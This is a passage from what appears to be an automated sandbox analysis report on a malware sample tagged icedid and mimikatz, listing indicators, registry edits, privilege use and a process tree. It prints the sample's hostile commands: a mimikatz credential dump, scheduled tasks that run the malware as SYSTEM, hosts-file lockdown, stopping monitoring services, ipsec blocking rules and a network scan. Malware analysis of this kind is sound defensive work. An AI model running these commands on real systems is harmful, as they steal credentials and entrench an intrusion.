opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtcpitiu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ceitlwt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kcyycg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vgcgjtnzb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ceitlwt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1076 PING.EXE 3104 cmd.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00070000000234d4-6.dat nsis_installer_2 behavioral2/files/0x000a00000002342e-15.dat nsis_installer_1 behavioral2/files/0x000a00000002342e-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 47 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ceitlwt.exe Key created \REGISTRY\USER\.DEFAULT\Software gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ceitlwt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ceitlwt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ceitlwt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ceitlwt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ceitlwt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ceitlwt.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1076 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3644 schtasks.exe 2484 schtasks.exe 4916 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3944 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 3944 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3268 ceitlwt.exe Token: SeDebugPrivilege 4772 ceitlwt.exe Token: SeDebugPrivilege 668 vfshost.exe Token: SeDebugPrivilege 2416 gyzjuuiut.exe Token: SeLockMemoryPrivilege 4512 iggias.exe Token: SeLockMemoryPrivilege 4512 iggias.exe Token: SeDebugPrivilege 3000 gyzjuuiut.exe Token: SeDebugPrivilege 3500 gyzjuuiut.exe Token: SeDebugPrivilege 2960 gyzjuuiut.exe Token: SeDebugPrivilege 3240 gyzjuuiut.exe Token: SeDebugPrivilege 4796 gyzjuuiut.exe Token: SeDebugPrivilege 3796 gyzjuuiut.exe Token: SeDebugPrivilege 4412 gyzjuuiut.exe Token: SeDebugPrivilege 4564 gyzjuuiut.exe Token: SeDebugPrivilege 1184 gyzjuuiut.exe Token: SeDebugPrivilege 4648 gyzjuuiut.exe Token: SeDebugPrivilege 4364 gyzjuuiut.exe Token: SeDebugPrivilege 1064 gyzjuuiut.exe Token: SeDebugPrivilege 3808 gyzjuuiut.exe Token: SeDebugPrivilege 3824 gyzjuuiut.exe Token: SeDebugPrivilege 4876 gyzjuuiut.exe Token: SeDebugPrivilege 2812 gyzjuuiut.exe Token: SeDebugPrivilege 3804 gyzjuuiut.exe Token: SeDebugPrivilege 4648 gyzjuuiut.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3944 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe 3944 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe 3268 ceitlwt.exe 3268 ceitlwt.exe 4772 ceitlwt.exe 4772 ceitlwt.exe 5076 xohudmc.exe 3652 kcyycg.exe 4044 ceitlwt.exe 4044 ceitlwt.exe 5808 ceitlwt.exe 5808 ceitlwt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3944 wrote to memory of 3104 3944 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe 84 PID 3944 wrote to memory of 3104 3944 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe 84 PID 3944 wrote to memory of 3104 3944 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe 84 PID 3104 wrote to memory of 1076 3104 cmd.exe 87 PID 3104 wrote to memory of 1076 3104 cmd.exe 87 PID 3104 wrote to memory of 1076 3104 cmd.exe 87 PID 3104 wrote to memory of 3268 3104 cmd.exe 94 PID 3104 wrote to memory of 3268 3104 cmd.exe 94 PID 3104 wrote to memory of 3268 3104 cmd.exe 94 PID 4772 wrote to memory of 2984 4772 ceitlwt.exe 96 PID 4772 wrote to memory of 2984 4772 ceitlwt.exe 96 PID 4772 wrote to memory of 2984 4772 ceitlwt.exe 96 PID 2984 wrote to memory of 2484 2984 cmd.exe 98 PID 2984 wrote to memory of 2484 2984 cmd.exe 98 PID 2984 wrote to memory of 2484 2984 cmd.exe 98 PID 2984 wrote to memory of 1548 2984 cmd.exe 99 PID 2984 wrote to memory of 1548 2984 cmd.exe 99 PID 2984 wrote to memory of 1548 2984 cmd.exe 99 PID 2984 wrote to memory of 1240 2984 cmd.exe 100 PID 2984 wrote to memory of 1240 2984 cmd.exe 100 PID 2984 wrote to memory of 1240 2984 cmd.exe 100 PID 2984 wrote to memory of 2848 2984 cmd.exe 101 PID 2984 wrote to memory of 2848 2984 cmd.exe 101 PID 2984 wrote to memory of 2848 2984 cmd.exe 101 PID 2984 wrote to memory of 4300 2984 cmd.exe 102 PID 2984 wrote to memory of 4300 2984 cmd.exe 102 PID 2984 wrote to memory of 4300 2984 cmd.exe 102 PID 2984 wrote to memory of 3028 2984 cmd.exe 103 PID 2984 wrote to memory of 3028 2984 cmd.exe 103 PID 2984 wrote to memory of 3028 2984 cmd.exe 103 PID 4772 wrote to memory of 4764 4772 ceitlwt.exe 107 PID 4772 wrote to memory of 4764 4772 ceitlwt.exe 107 PID 4772 wrote to memory of 4764 4772 ceitlwt.exe 107 PID 4772 wrote to memory of 1960 4772 ceitlwt.exe 109 PID 4772 wrote to memory of 1960 4772 ceitlwt.exe 109 PID 4772 wrote to memory of 1960 4772 ceitlwt.exe 109 PID 4772 wrote to memory of 3412 4772 ceitlwt.exe 111 PID 4772 wrote to memory of 3412 4772 ceitlwt.exe 111 PID 4772 wrote to memory of 3412 4772 ceitlwt.exe 111 PID 4772 wrote to memory of 4952 4772 ceitlwt.exe 115 PID 4772 wrote to memory of 4952 4772 ceitlwt.exe 115 PID 4772 wrote to memory of 4952 4772 ceitlwt.exe 115 PID 4952 wrote to memory of 4700 4952 cmd.exe 117 PID 4952 wrote to memory of 4700 4952 cmd.exe 117 PID 4952 wrote to memory of 4700 4952 cmd.exe 117 PID 4700 wrote to memory of 796 4700 wpcap.exe 118 PID 4700 wrote to memory of 796 4700 wpcap.exe 118 PID 4700 wrote to memory of 796 4700 wpcap.exe 118 PID 796 wrote to memory of 3040 796 net.exe 120 PID 796 wrote to memory of 3040 796 net.exe 120 PID 796 wrote to memory of 3040 796 net.exe 120 PID 4700 wrote to memory of 5084 4700 wpcap.exe 121 PID 4700 wrote to memory of 5084 4700 wpcap.exe 121 PID 4700 wrote to memory of 5084 4700 wpcap.exe 121 PID 5084 wrote to memory of 4412 5084 net.exe 123 PID 5084 wrote to memory of 4412 5084 net.exe 123 PID 5084 wrote to memory of 4412 5084 net.exe 123 PID 4700 wrote to memory of 692 4700 wpcap.exe 124 PID 4700 wrote to memory of 692 4700 wpcap.exe 124 PID 4700 wrote to memory of 692 4700 wpcap.exe 124 PID 692 wrote to memory of 668 692 net.exe 126 PID 692 wrote to memory of 668 692 net.exe 126 PID 692 wrote to memory of 668 692 net.exe 126 PID 4700 wrote to memory of 1980 4700 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1704
-
C:\Windows\TEMP\kukrtgjtl\iggias.exe"C:\Windows\TEMP\kukrtgjtl\iggias.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\iyvumtbf\ceitlwt.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1076
-
-
C:\Windows\iyvumtbf\ceitlwt.exeC:\Windows\iyvumtbf\ceitlwt.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3268
-
-
-
C:\Windows\iyvumtbf\ceitlwt.exeC:\Windows\iyvumtbf\ceitlwt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2484
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1240
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4300
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4764
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1960
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bjvibcuuu\vrituptli\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\bjvibcuuu\vrituptli\wpcap.exeC:\Windows\bjvibcuuu\vrituptli\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3040
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4412
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:668
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1980 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2272
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2308 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1416
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4320 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3744
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bjvibcuuu\vrituptli\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2704 -
C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exeC:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bjvibcuuu\vrituptli\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bjvibcuuu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bjvibcuuu\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4352 -
C:\Windows\bjvibcuuu\Corporate\vfshost.exeC:\Windows\bjvibcuuu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "utvtlzbly" /ru system /tr "cmd /c C:\Windows\ime\ceitlwt.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "utvtlzbly" /ru system /tr "cmd /c C:\Windows\ime\ceitlwt.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "etlbiltut" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iyvumtbf\ceitlwt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "etlbiltut" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iyvumtbf\ceitlwt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "weumgilty" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F"2⤵PID:1236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "weumgilty" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4916
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
